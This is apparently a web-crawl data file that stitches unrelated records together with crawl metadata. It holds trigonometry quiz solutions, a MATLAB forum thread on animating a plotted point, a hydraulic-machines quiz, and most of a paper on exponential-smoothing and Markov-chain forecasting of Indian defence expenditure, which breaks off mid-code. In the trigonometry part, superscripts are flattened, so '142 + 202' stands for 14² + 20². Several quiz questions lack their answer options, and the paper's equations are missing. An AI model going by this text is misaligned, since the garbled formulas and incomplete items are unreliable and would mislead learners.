the figure. If ABC is xo, then find the distance between B and C.\n[b = 14, c = 20, x = 50,y = 30.]", null, "A. 21.7 cm\nB. 16.1 cm\nC. 34.3 cm\nD. 15.5 cm\n\nStep: 1\nBC2 = AB2 + AC2 - 2(AB)(AC)) cosBAC\n[Use law of Cosines.]\nStep: 2\nBC2 = 142 + 202 - 2(14)(20) cos 50o30'\nStep: 3\nBC2 239.796320\n[Simplify.]\nStep: 4\nBC = 15.5\n[Simplify.]\nStep: 5\nThe distance between B and C is 15.5 cm.\nCorrect Answer is :   15.5 cm\nQ6In ΔABC, if B = 64o, C = 64o, and b = 26 units, then find the length of a.\n\nA. 23 units\nB. 26 units\nC. 20 units\nD. 30 units\n\nStep: 1\nA = 180o - (64o + 64o)\n[Sum of the measures of angles in a triangle is 180o.]", null, "Step: 2\nA = 52o\nStep: 3\nsin 52oa = sin 64o26\n[Use law of sines: sin Aa = sin Bb.]\nStep: 4\na = 26 sin 52osin 64o = 23 units, to two significant digits.\n[Simplify.]\nCorrect Answer is :   23 units\nQ7In triangle DEF, if D = 45°, f = 11, and e = 9, then find the length of d.[Round it to the nearest whole number].", null, "A. 21\nB. 10\nC. 13\nD. 8\n\nStep: 1\nd2 = 112 + 92 - 2(11)(9) cos 45°\n[Using law of cosines:\nd2 = e2 + f2 - 2ef cos D.]\nStep: 2\nd2 62.014\nStep: 3\nd = 8.\n[Simplify using calculator.]\nQ8In ΔDEF, if d = 28, e = 28, and f = 35, then find F to the nearest degree.", null, "A. 13°\nB. 77°\nC. 81°\nD. 83°\n\nStep: 1\nCos F = 282+282-3522(28)(28)\n[Use law of cosines:\nCos F = d2+e2-f22de.]\nStep: 2\nCos F 0.2188\nStep: 3\nF 77°\nQ9In ΔABC, if ∠A = 62°, a = 14 in., b = 8 in., then find the length of c to the nearest two significant digits.", null, "A. 14 in.\nB. 24 in.\nC. 17 in.\nD. 
16 in.\n\nStep: 1\nsin 62°14 = sin B8\n[Use law of Sines: sin Aa = sin Bb.]\nStep: 2\nsin B = 8 sin 62°14\nStep: 3\nsin B = 0.50\n[Simplify.]\nStep: 4\n∠B = 30° or 150°\nStep: 5\nThe measure of 150° is not possible, since 150° + 62° = 212° and 212° is greater than 180°.\nStep: 6\nSo, ∠B = 30°.\nStep: 7\n∠C = 180° - (62° + 30°) = 88°\nStep: 8\nsin 88°c = sin 62°14\n[Use law of Sines: sin Cc = sin Aa.]\nStep: 9\nc = 14 sin 88°sin 62° = 16 in.\nCorrect Answer is :   16 in.\nQ10In ΔPQR, if Q = 68°, p = 17 units, and q = 23 units, then what is the measure of R to the nearest degree?", null, "A. 72°\nB. 44°\nC. 61°\nD. 68°\n\nStep: 1\nSin P17 = Sin 68°23\n[Use law of Sines : sin Pp = sin Qq .]\nStep: 2\nSin P = 17 Sin 68°23\nStep: 3\nSin P = 0.7\n[Simplify.]\nStep: 4\nP = 44° (or) P = 136°\nStep: 5\nThe measure of 136° is not possible, since 136° + 68° = 204° and 204° is greater than 180°.\nStep: 6\nSo, P = 44°.\nStep: 7\nR = 180 - (68o + 44o)\n[Sum of the angle measures in a triangle is 180o.]\nStep: 8\nR = 68o\nQ11In ΔABC, if C = 73o, a = 11 units, c = 17 units, then find B to the nearest degree.\nA. 38o\nB. 59o\nC. 142o\nD. 69o\n\nStep: 1\nsin A11 = sin 73o17\n[Use law of Sines: sin Aa = sin Cc .]", null, "Step: 2\nsin A = 11 sin 73o17\nStep: 3\nsin A = 0.62\nStep: 4\nA = 38o (or) 142o\nStep: 5\nThe measure of 142o is not possible, since 142o + 73o = 215o and 215o is greater than 180o.\nStep: 6\nSo, A = 38o.\nStep: 7\nB = 180 - (38o + 73o)\n[Sum of the angle measures in a triangle is 180o.]\nStep: 8\nB = 69o\nQ12In triangle DEF, D = θ = 35°44′, e = 12.5 units, and f = 17.4 units. What is the length d to four significant digits?", null, "A. 15.42\nB. 10.29\nC. 10.2637\nD. 20.412\n\nStep: 1\nd2 = 12.52 + 17.42 - 2(12.5)(17.4) cos 35°44′\n[Use law of cosines:\nd2 = e2 + f2 - 2ef cos D.]\nStep: 2\nd2 ≈ 105.901\nStep: 3\nd = 10.29, to four significant digits" ]
[ null, "http://qimg.icoachmath.com/qd/50001-55000/53490.gif", null, "http://qimg.icoachmath.com/qd/50001-55000/53639.gif", null, "http://qimg.icoachmath.com/qd/50001-55000/53750.gif", null, "http://qimg.icoachmath.com/qs/125001-150000/135606_23620.gif", null, "http://qimg.icoachmath.com/qd/50001-55000/53780.gif", null, "http://qimg.icoachmath.com/qd/50001-55000/53801.gif", null, "http://qimg.icoachmath.com/qd/80001-85000/81211.gif", null, "http://qimg.icoachmath.com/qd/80001-85000/81381.gif", null, "http://qimg.icoachmath.com/qs/200001-225000/211821_33817.gif", null, "http://qimg.icoachmath.com/qd/80001-85000/81382.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.618762,"math_prob":0.9996995,"size":416,"snap":"2020-10-2020-16","text_gpt3_token_len":209,"char_repetition_ratio":0.1723301,"word_repetition_ratio":0.02,"special_character_ratio":0.55528843,"punctuation_ratio":0.17699115,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999335,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-20T18:01:15Z\",\"WARC-Record-ID\":\"<urn:uuid:d77e4812-98f2-4e95-81e5-5c06f9e0a72c>\",\"Content-Length\":\"63287\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:938f30fe-9a0c-4708-ae7c-d725e8b10612>\",\"WARC-Concurrent-To\":\"<urn:uuid:4e9a843c-125a-4815-b583-506c43c4df43>\",\"WARC-IP-Address\":\"52.52.93.178\",\"WARC-Target-URI\":\"http://www.icoachmath.com/topics/Geometry/Law-of-Sines-and-Cosines-to-Solve-Triangles.html\",\"WARC-Payload-Digest\":\"sha1:SN7T77VBXVNNM7TLL54WDALJHO3XXMO7\",\"WARC-Block-Digest\":\"sha1:O25SFL4RFJOOLAUS5M2WRPGY4IB63VWK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875145260.40_warc_CC-MAIN-20200220162309-20200220192309-00528.warc.gz\"}"}
https://ch.mathworks.com/matlabcentral/answers/693465-clear-one-plot-in-multiple-hold-figure?s_tid=prof_contriblnk
[ "# clear one plot in multiple (hold) figure\n\n5 views (last 30 days)\nislam dib on 14 Dec 2020\nAnswered: Ameer Hamza on 14 Dec 2020\nHello,\nI want to follow a point by plotting him every time. I want just plot the point not all previous points.\nI've tried to use this code, but it gives all points.\nx = 1:0.01:25;\ny = sin(x);\nn = numel(x);\n%figure;\nfor i = 1:n\nh=plot(x(1:i),y(1:i),'+r');\nxlim([0 25]);\nylim([-1.1 1.1]);\n%refreshdata(figure,'base')\npause(0.001);\n% drawnow;\ndelete(h)\nend\nHow can I fix the problem ?\n\nKALYAN ACHARJYA on 14 Dec 2020\nEdited: KALYAN ACHARJYA on 14 Dec 2020\nx = 1:0.01:25;\ny = sin(x);\nn = numel(x);\n%figure;\nfor i = 1:n\nh=plot(x(i),y(i),'+r');\nxlim([0 25]);\nylim([-1.1 1.1]);\npause(0.001);\ndelete(h)\nend\n\nAmeer Hamza on 14 Dec 2020\nAnother computationally efficient approach is to create a single line object and update its XData and YData properties\nx = 1:0.01:25;\ny = sin(x);\nn = numel(x);\n%figure;\nh = plot(nan, '+r');\nxlim([0 25]);\nylim([-1.1 1.1]);\nhold on\nfor i = 1:n\nh.XData = x(i);\nh.YData = y(i);\n%refreshdata(figure,'base')\npause(0.001);\nend" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83538985,"math_prob":0.996787,"size":334,"snap":"2021-31-2021-39","text_gpt3_token_len":117,"char_repetition_ratio":0.11515152,"word_repetition_ratio":0.0,"special_character_ratio":0.4071856,"punctuation_ratio":0.23529412,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99849063,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-22T23:37:43Z\",\"WARC-Record-ID\":\"<urn:uuid:dd49a8fd-a57f-4bc9-896d-d2ebcaf0cd42>\",\"Content-Length\":\"119325\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:26d8b9b9-163b-4bea-8900-b07df75865cc>\",\"WARC-Concurrent-To\":\"<urn:uuid:08c65b0e-b1ce-4217-9183-e1fbee27d33a>\",\"WARC-IP-Address\":\"23.56.12.57\",\"WARC-Target-URI\":\"https://ch.mathworks.com/matlabcentral/answers/693465-clear-one-plot-in-multiple-hold-figure?s_tid=prof_contriblnk\",\"WARC-Payload-Digest\":\"sha1:3XTGCIXSGGCHLVRI2WIULKHEGBV7VRLT\",\"WARC-Block-Digest\":\"sha1:R3K6CKJYXI2TZW6B3ZDGG7UYLIDRHQNV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057403.84_warc_CC-MAIN-20210922223752-20210923013752-00435.warc.gz\"}"}
https://www.objectivebooks.com/2015/04/hydraulic-machines-fluid-machineries_70.html
[ "Hydraulic Machines-Fluid Machineries - Set 06 - ObjectiveBooks\n\n# Practice Test: Question Set - 06\n\n1. The centrifugal pump preferred for a specific speed between 80 to 160 r.p.m. is\n(A) Slow speed with radial flow at outlet\n(B) Medium speed with radial flow at outlet\n(C) High speed with radial flow at outlet\n(D) High speed with mixed flow at outlet\n\n2. Reaction turbines are used for\n(C) High head and low discharge\n(D) Low head and high discharge\n\n3. Which of the following hydraulic unit is used for transmitting increased or decreased torque to the driven shaft?\n(A) Hydraulic ram\n(B) Hydraulic intensifier\n(C) Hydraulic torque converter\n(D) Hydraulic accumulator\n\n4. A centrifugal pump will start delivering liquid only when the pressure rise in the impeller is equal to the\n\n5. If a pump is handling water and is discharging a certain flow Q at a constant total dynamic head requiring a definite B.H.P., the same pump when handling a liquid of specific gravity 0.75 and viscosity nearly same as of water would discharge\n(A) Same quantity of liquid\n(B) 0.75 Q\n(C) Q/0.75\n(D) 1.5 Q\n\n6. The overall efficiency of a reaction turbine is the ratio of\n(A) Power produced by the turbine to the energy actually supplied by the turbine\n(B) Actual work available at the turbine to the energy imparted to the wheel\n(C) Work-done on the wheel to the energy (or head of water) actually supplied to the turbine\n(D) None of the above\n\n7. The force exerted by a jet of water (in a direction normal to flow) impinging on a fixed plate inclined at an angle θ with the jet is\n(A) (waV/2g) × sin θ\n(B) (waV/g) × sin θ\n(C) (waV²/2g) × sin 2θ\n(D) (waV²/g) × sin θ\n\n8. Casting of a centrifugal pump is designed so as to minimize\n(A) Friction loss\n(B) Cavitations\n(D) Loss of kinetic energy\n\n9. A hydraulic ram is a device used to\n(A) Store the energy of water\n(B) Increase the pressure of water\n(C) To lift water from deep wells\n(D) To lift small quantity of water to a greater height when a large quantity of water is available at a smaller height\n\n10. According to fan laws, at constant speed and capacity, the pressure and power vary\n(A) Directly as the air or gas density\n(B) Inversely as square root of density\n(C) Inversely as density\n(D) As square of density\n\n11. The ratio of quantity of liquid discharged per second from the pump to the quantity of liquid passing per second through the impeller is known as\n(A) Manometric efficiency\n(B) Mechanical efficiency\n(C) Overall efficiency\n(D) Volumetric efficiency\n\n12. Discharge (Q) of a centrifugal pump is given by (where D = Diameter of impeller at inlet, b = Width of impeller at inlet, and Vf = Velocity of flow at inlet)\n(A) Q = π.D.Vf\n(B) Q = π.b.Vf\n(C) Q = π.D.bf.V\n(D) Q = D.b.Vf\n\n13. Multistage centrifugal pumps are used to obtain\n(A) High discharge\n(C) Pumping of viscous fluids\n(D) High head and high discharge\n\n14. Which of the following turbine is preferred for 0 to 25 m head of water?\n(A) Pelton wheel\n(B) Kaplan turbine\n(C) Francis turbine\n(D) None of these\n\n15. Dynamic similarity is said to exist between the model and the prototype, if both of them\n(A) Have identical velocities\n(B) Are equal in size and shape\n(C) Are identical in shape, but differ only in size\n(D) None of the above\n\nShow and hide multiple DIV using JavaScript View All Answers\n\nBlogger Comment" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85964495,"math_prob":0.9837286,"size":3443,"snap":"2022-27-2022-33","text_gpt3_token_len":1055,"char_repetition_ratio":0.1357953,"word_repetition_ratio":0.034379672,"special_character_ratio":0.28463548,"punctuation_ratio":0.065868266,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9743286,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-30T11:22:16Z\",\"WARC-Record-ID\":\"<urn:uuid:e0cbf6fe-ad77-4055-8d13-fe59e4189165>\",\"Content-Length\":\"208586\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a2529f7f-d367-4535-b4c4-5c35029bab13>\",\"WARC-Concurrent-To\":\"<urn:uuid:5396a2a2-e838-43e0-a519-e81e6e03dcce>\",\"WARC-IP-Address\":\"172.253.62.121\",\"WARC-Target-URI\":\"https://www.objectivebooks.com/2015/04/hydraulic-machines-fluid-machineries_70.html\",\"WARC-Payload-Digest\":\"sha1:NA6EGLQB4CFGDAROWB4TYHSYREYVU737\",\"WARC-Block-Digest\":\"sha1:DNMEC6ENHRBZUXRVJAL52H7VHTJOF5H6\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103671290.43_warc_CC-MAIN-20220630092604-20220630122604-00709.warc.gz\"}"}
https://www.hindawi.com/journals/mpe/2020/6210616/
[ "Research Article | Open Access\n\nVolume 2020 |Article ID 6210616 | https://doi.org/10.1155/2020/6210616\n\nTong Niu, Lin Zhang, Bo Zhang, Bofan Yang, Shengjun Wei, \"An Improved Prediction Model Combining Inverse Exponential Smoothing and Markov Chain\", Mathematical Problems in Engineering, vol. 2020, Article ID 6210616, 11 pages, 2020. https://doi.org/10.1155/2020/6210616\n\n# An Improved Prediction Model Combining Inverse Exponential Smoothing and Markov Chain\n\nRevised07 Aug 2020\nAccepted16 Sep 2020\nPublished28 Sep 2020\n\n#### Abstract\n\nOn the basis of the triple exponential smoothing prediction model, this paper introduces the reverse prediction idea and establishes the reverse triple exponential smoothing model by setting parameters such as threshold value and iteration times and reasonably correcting its initial value. This method can effectively reduce the error of early prediction value. At the same time, aiming at the problem that the predicting advantage of the reverse triple exponential smoothing model weakens in the later period, Markov theory is introduced to correct its error value, and an improved prediction model combining inverse exponential smoothing and Markov chain is further established. The improved model combines the advantages of index model trend prediction and Markov fluctuation prediction, and the prediction accuracy and stability of the model are significantly improved through case tests.\n\n#### 1. Introduction\n\nNational defense expenditure is an important component of national financial expenditure. It is the source of funds and important support for national defense and military construction. It reflects the economic level of a country’s investment in national defense construction and embodies national defense policy and national defense strategy . Predicting a country’s national defense expenditure is not only helpful to analyze the trend of the country’s national defense and military construction but also helpful to analyze the relationship between its national defense expenditure and economic growth. Therefore, it is of far-reaching practical significance to make a reasonable prediction of national defense expenditure. In this paper, a new model is established on the basis of exponential smoothing model to effectively predict defense expenditure.\n\nExponential smoothing method is a time series analysis and prediction method. This method predicts the future trend according to the current situation and data by calculating the smoothing value of the index and combining with a reasonable time series prediction model . The exponential smoothing method can be divided into single exponential smoothing method, double exponential smoothing method, and triple exponential smoothing method according to exponential times. Among them, the triple exponential smoothing method is often used to fit and predict nonlinear time series and has achieved good prediction effect especially in short-term and medium-term prediction of nonlinear time series, with small error fluctuation range and strong credibility. At present, it has been widely used in the fields of public transportation passenger volume prediction [5, 6], economic output value prediction [7, 8], spare parts prediction [9, 10], wind speed prediction of wind farms [11, 12], building displacement prediction [13, 14], GPS PWV prediction , Docker container resource load prediction , etc. Qi and Huo proposed a single exponential smoothing model based on self-adaptation. 
By introducing the approximate dynamic programming method and combining with the actual traffic flow data, the exponential smoothing coefficient was optimized to make it update automatically with the prediction process, thus ensuring the real-time accuracy of the prediction . Wang et al. proposed an adaptive dynamic cubic exponential smoothing prediction method. In this method, the carpet search method is used, the best smoothing coefficient is obtained according to the principle of minimum sum of squares error, and the prediction effect of the model is verified by an example of wind speed data . Mi et al. proposed a short-term power load forecasting method based on improved exponential smoothing gray model. This method combined the exponential smoothing model and gray model and used the 0.618 method to search for the best smoothing coefficient, which achieved good prediction effect . Liu et al. proposed a new short-medium satellite clock error prediction algorithm based on the modified exponential smoothing method, improved the weighted parameters in ES, and proposed the dynamic weighted parameters based on the sliding window. The gray scale model (GM) is introduced to learn the prediction error of DES, which improves the prediction accuracy of the algorithm .\n\nIn this paper, the triple exponential smoothing predicting model is applied to the field of defense expenditure prediction. On the basis of the triple exponential smoothing model, the error trend and fluctuation of the initial data are fully considered, the reverse predicting idea and Markov state transition matrix are introduced to correct its data fluctuation, and a reverse triple exponential smoothing model based on Markov correction is established. After example verification, the new model has higher prediction accuracy in the field of national defense expenditure than the traditional triple exponential smoothing model.\n\n#### 2. Triple Exponential Smoothing Model\n\nExponential smoothing model is a weighted average model that uses dynamic weight coefficients to weigh the original data. And the biggest characteristic of this method is that it focuses on the influence of recent data on the prediction model . In other words, the more recent the data, the greater the weight coefficient and the smaller the weight coefficient of the earlier data. The triple exponential smoothing method is to add another exponential smoothing on the basis of the first exponential smoothing and the second quadratic exponential smoothing. By estimating the parameters of the quadratic curve model, the nonlinear time series can be adjusted to eliminate irregular disturbances and random errors. It is suitable for numerical prediction of quadratic curve trend of original data.\n\n##### 2.1. Traditional Triple Exponential Smoothing Model\n\nLet the time series bewhere is the time series data at time , is the first group of time series data, is the second group of time series data, is the third group of time series data, and is the th group of time series data.\n\nSingle exponential smoothing series:\n\nDouble exponential smoothing series:\n\nTriple exponential smoothing series:\n\nAmong them, , , and are exponential smoothing values (); , , and are exponential smoothing initial values, which generally take the first original value or the average of the previous original values. According to the initial value of exponential smoothing and the original time series, the exponential smoothing value at the following time is determined. 
In these recurrences, α is the smoothing coefficient (0 < α < 1). The existing literature usually uses the MSE, MAE, or AARE minimum principle, or subjective judgement, to determine a reasonable value of α. The larger α is, the more weight the prediction places on new data, the greater the role of new data, the more sensitive the prediction results, and the better the ability to adapt to new levels. The smaller α is, the more weight is placed on old data, the more conservative the prediction results, and the slower the response to changes in the actual data, so lag can easily occur [22, 23]. In this paper, the AARE minimum principle is used to determine the value of α. The parameters a, b, and c of the quadratic trend are calculated from the exponential smoothing values (the estimation formulas are included in the sketch above), and the quadratic parabola model built from a, b, and c is used, with T denoting the number of lead periods, to predict the future value T periods ahead.

Generally speaking, when the number of items in the original time series is large (more than 25 items), the triple exponential smoothing method takes the first original value as the initial smoothing value. When the original data contain 25 items or fewer, the average of the first few periods of data is often taken as the initial value instead. In general, however, the selection of the initial value is quite subjective, which introduces a certain error into the prediction trend of the later model. Although this error often has little influence on medium- and long-term predictions built from a large amount of data, it cannot be ignored in short-term prediction. This paper therefore introduces reverse prediction: because an unreasonable choice of initial value can make the error of future predicted values large, a reverse triple exponential smoothing model is established to address the problem.

##### 2.2. Reverse Triple Exponential Smoothing Model

The inverse triple exponential smoothing model is based on the triple exponential smoothing model and uses the idea of reverse prediction to correct the initial value of exponential smoothing. First, the traditional triple exponential smoothing model is used to predict ahead and obtain several predicted values (how many is chosen according to need; this paper takes three, matching the example in Section 4). At this stage, the initial value selected by the model is the first value of the original data. Then, the obtained predicted values and the actual values are used for reverse prediction to obtain reverse-predicted values of the first three items of the original data. Because of the quadratic parabola trend of the triple exponential smoothing model, if the data are fitted well, the initial values obtained by reverse prediction are closely related to, and numerically similar to, the first three items of the actual data. The modified initial value is then obtained by weighting the reverse-predicted initial values against the initial values of the original data. The specific steps are as follows.

Definition 1. Let the original sequence for a single reverse prediction be the observed series extended by the forward-predicted values.
(i) Step 1. The traditional triple exponential smoothing model is used to fit the original data containing n items, and the forward predictions are obtained.
(ii) Step 2. Establish the reverse prediction sequence by reversing this extended series, so that the predicted values come first and the observed data follow in reverse time order.
(iii) Step 3. Establish a triple exponential smoothing model for the newly established reverse sequence to obtain reverse-predicted values of the first three items of the original data.
(iv) Step 4. The reverse-predicted values and the observed values of the first three items are weighted and combined to obtain a corrected initial value after the single reverse prediction, where the adjustment factor (usually 0.5) controls the weight given to the reverse-predicted values.
(v) Step 5. Set the threshold index. According to the actual demand, a corresponding threshold value is set, and the fitting accuracy of the new model is judged using different accuracy test indexes. If the accuracy meets the requirements, the model can be used for prediction. If it does not, the next reverse prediction is carried out, and the procedure is repeated until the initial value meets the accuracy requirements after a number of iterations; the corresponding prediction is then carried out with the model.
(vi) Step 6. Output the predicted value. The improved triple exponential smoothing model is established using the modified initial values, and the predicted values are obtained. A sketch of one reverse-correction pass is given below.
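The following sketch shows one plausible implementation of a single reverse-prediction pass (Steps 1–4), reusing the helpers from the earlier sketch. The construction of the reversed sequence, the back-casting of the first three items, and the name `lam` for the adjustment factor are assumptions made for illustration; the paper's exact weighting formulas are not reproduced here.

```python
def reverse_corrected_initial_value(x, alpha, lam=0.5, n_ahead=3):
    """One reverse-prediction pass (Section 2.2, Steps 1-4), sketched.

    `lam` plays the role of the adjustment factor (usually 0.5); the
    corrected initial value is the weighted mean of the reverse-predicted
    and observed first three terms.
    """
    x = list(x)
    # Step 1: forward fit, then predict n_ahead future values.
    _, coeffs = triple_exponential_smoothing(x, alpha)
    future = [forecast(coeffs, T) for T in range(1, n_ahead + 1)]
    # Step 2: reverse the extended series; its last three elements are
    # now x[2], x[1], x[0], the items we want to re-estimate.
    rev = (x + future)[::-1]
    # Step 3: fit the reversed series without its last three points and
    # forecast them, giving reverse-predicted x[2], x[1], x[0].
    _, rcoeffs = triple_exponential_smoothing(rev[:-3], alpha)
    rev_first3 = [forecast(rcoeffs, T) for T in range(1, 4)][::-1]
    # Step 4: weight reverse-predicted against observed values and
    # average them into a single corrected initial value.
    corrected = [lam * p + (1 - lam) * o for p, o in zip(rev_first3, x[:3])]
    return sum(corrected) / 3.0
```

In the iterative variant (Step 5), this value would replace the initial smoothing value, the model would be refitted, and the pass repeated until the chosen accuracy index falls below the threshold.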
#### 3. Improved Prediction Model Combining Inverse Exponential Smoothing and Markov Chain

The Markov model is a stochastic time series analysis method that predicts the future state of a system by studying its possible states and the state transition probability matrix, and it has high accuracy and adaptability [14, 25–27]. The method requires little historical data, needing only recent data and information about the predicted object, and it corrects errors well for data with large random fluctuations. Markov theory is a branch of stochastic processes in which future system development is predicted from the transition probabilities between states; the core of the modeling is to capture the law of state transition. The basic idea of the Markov probabilistic prediction model is to analyze the current situation of the system and use a Markov chain to obtain the probability of each state into which the system may move in the future.

Assuming the observable data in the time series are discrete, the range of error values is divided into intervals, so the series takes a finite set of states. Let P_i be the probability that the sequence is in state i and P_ij the probability of transferring from state i to state j. When the value of the series at the next time depends only on the current state and the transition probabilities, the series has the Markov property.

Based on the inverse triple exponential smoothing model, the Markov state transition probability matrix is used to predict the error fluctuation, thereby correcting the error and further improving the prediction accuracy of the model. The specific steps are as follows (a code sketch of the correction pipeline is given at the end of this section):
(i) Step 1. According to the nature of the state transition and the full probability formula, deduce the equation of the Markov chain, in which P_i is the probability of the sequence being in state i and P_ij is the probability of transferring from state i to state j.
(ii) Step 2. State interval division. According to the prediction results of the inverse triple exponential smoothing model, the error between the predictions and the actual values is calculated, corresponding interval thresholds are set, and the errors are divided into several intervals. The error used here is usually the relative error or the actual residual.
(iii) Step 3. Calculate the initial probability. Assuming the definition domain of the errors is known, this domain is divided into states according to the chosen thresholds. For the observed series, only the previously observed transition states are known, and the transition state of the last term is unknown. Calculating the initial probability requires counting how many of the previous data fall into each state; the occurrence frequency of a state is the number of data in that state divided by the total number of data.
(iv) Step 4. Construct the Markov state transition matrix and calculate the transition probabilities. The transition probabilities of the error from one state to another define the state transition probability matrix: if the number of transitions from state i to state j is n_ij and the total number of transitions leaving state i is N_i, then the probability of a transition from state i to state j is p_ij = n_ij / N_i, and the one-step state transition probability matrix is constructed from these values [29, 30]. After predicting n periods ahead from the current state, the transition probability matrix correspondingly becomes the n-step matrix.
(v) Step 5. Error correction. Given the state into which the observed data currently fall, the corresponding row of the transition matrix shows which state has the largest transition probability, so the most likely next state can be predicted. Once the state transition probability matrix is determined, the next most likely state and its error interval are known, so the error of that state can be reasonably estimated. In this paper, the median value of the predicted state's error interval is used to correct the Markov error.
(vi) Step 6. Output the corrected predicted value.

The overall flowchart of building the model is shown in Figure 1. First is the selection of the research object: trend analysis, seasonal analysis, periodic analysis, and other methods are used to identify the time series and determine the applicable model; in this paper, the exponential smoothing model is selected according to the data instance. Second, the traditional exponential smoothing model is studied: different principles are adopted to determine the relevant parameters, which are substituted into the recursive formulas to calculate the coefficients of the exponential smoothing model. Third is the improvement stage of the exponential smoothing model: the inverse prediction method is used to determine the number of iterations and other parameters, and the initial value is corrected so as to output the inverse triple exponential smoothing initial-value correction model. Fourth, an improved prediction model combining inverse exponential smoothing and a Markov chain is established: on the basis of the inverse triple exponential smoothing model, Markov theory is introduced to correct the fluctuation error by dividing the state intervals and establishing the probability transition matrix. Finally, in the verification and analysis stage, the accuracy of the traditional exponential smoothing model, the inverse triple exponential smoothing model, and the improved combined model is tested, the prediction effects are analyzed, and the optimal prediction model is output.
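A compact sketch of Steps 2–6, under stated assumptions: the state intervals are passed in as (low, high] pairs, the transition matrix is estimated by simple counting as in Step 4, and the correction convention assumed is that a relative error e relates prediction and actual value by actual ≈ prediction / (1 + e). The function names are illustrative.

```python
import numpy as np

def to_state(e, intervals):
    """Step 2: map a relative error to the index of its (low, high] interval."""
    for k, (lo, hi) in enumerate(intervals):
        if lo < e <= hi:
            return k
    raise ValueError("error outside the defined state ranges")

def transition_matrix(states, n_states):
    """Step 4: one-step transition matrix, P[i, j] = n_ij / N_i."""
    counts = np.zeros((n_states, n_states))
    for i, j in zip(states[:-1], states[1:]):
        counts[i, j] += 1.0
    row_sums = counts.sum(axis=1, keepdims=True)
    return np.divide(counts, row_sums, out=np.zeros_like(counts), where=row_sums > 0)

def markov_corrected(pred, current_state, P, intervals):
    """Steps 5-6: pick the most likely next state, then correct the
    prediction by the midpoint of that state's relative-error interval."""
    nxt = int(np.argmax(P[current_state]))
    lo, hi = intervals[nxt]
    mid = (lo + hi) / 2.0
    return pred / (1.0 + mid), nxt
```

With intervals such as those later given in Table 9, this would be called with `intervals = [(-0.30, -0.10), (-0.10, 0.0), (0.0, 0.05), (0.05, 0.10)]`; the exact correction formula used in the paper may differ from the convention assumed here.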
#### 4. Instance Validation

##### 4.1. Data Selection

This paper selects India's defense expenditure data from 1990 to 2017 (Table 1) to verify the prediction accuracy of the model. Curve fitting of the data in MATLAB shows that this group of data follows an obvious quadratic parabola trend (Figure 2), and its growth trend is clear and relatively stable, which meets the data requirements of the triple exponential smoothing model. India's defense expenditure data from 1990 to 2012 are taken as the original time series, and the data from 2013 to 2017 are taken as the prediction test data.

| Year | Defense expenditure (hundred million rupees) |
| --- | --- |
| 1990 | 1875.57 |
| 1991 | 1989.42 |
| 1992 | 2130.22 |
| 1993 | 2645.63 |
| 1994 | 2833.00 |
| 1995 | 3273.12 |
| 1996 | 3588.35 |
| 1997 | 4354.92 |
| 1998 | 5106.19 |
| 1999 | 6274.99 |
| 2000 | 6469.72 |
| 2001 | 7029.45 |
| 2002 | 7216.66 |
| 2003 | 7739.66 |
| 2004 | 9648.66 |
| 2005 | 10350.30 |
| 2006 | 11019.10 |
| 2007 | 11904.20 |
| 2008 | 15175.60 |
| 2009 | 19932.90 |
| 2010 | 21456.00 |
| 2011 | 23733.80 |
| 2012 | 25730.60 |
| 2013 | 28459.70 |
| 2014 | 31943.60 |
| 2015 | 33228.20 |
| 2016 | 39667.30 |
| 2017 | 42350.60 |

Note. All data are from the official website of the Stockholm International Peace Research Institute: https://sipri.org/databases/milex. All data are denominated in rupees, India's official currency.

##### 4.2. Data Inspection Method

At present, the commonly used data inspection methods mainly include the following (y_i denotes the actual value of the ith time series item and ŷ_i its predicted value).
(1) Mean absolute error (MAE): the mean of the absolute differences between predicted and actual values. The smaller the MAE, the higher the prediction accuracy.
(2) Average absolute relative error (AARE): the mean of the absolute relative errors, usually expressed as a percentage. The smaller the value, the higher the prediction accuracy; the accuracy ranges of AARE are shown in Table 2.

| AARE value range | Below 10% | 10%–20% | 20%–50% | More than 50% |
| --- | --- | --- | --- | --- |
| Prediction model accuracy | High accuracy | Good accuracy | Feasible | Not feasible |

(3) Inequality coefficient (IC): its value lies between 0 and 1. The closer to 1, the worse the prediction accuracy; the closer to 0, the higher the prediction accuracy.

##### 4.3. Prediction Results and Analysis of Results

The data of India's defense expenditure from 1990 to 2012 are substituted into the traditional triple exponential smoothing prediction model, with the initial value set to the average of the first three data points. The value of the smoothing coefficient α is determined by the AARE minimum principle. The traditional triple exponential smoothing model is used to output the fitted values for 1990–2012 and the predicted values for 2013–2017. Then, the first three initial values are reverse-predicted using the 2013–2015 predicted values to establish a reverse triple exponential smoothing model, and the corresponding fitted values and the 2013–2017 predicted values are output.
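To make the Section 4.2 indexes concrete, the sketch below computes MAE, AARE, and IC (the IC form assumed here is the usual Theil-type coefficient). Applied to the 2013–2017 actual values and the model I predictions listed in Table 4 below, it matches the model I row of Table 8 (1318.51, 3.56%, 0.0240).

```python
import numpy as np

def mae(actual, pred):
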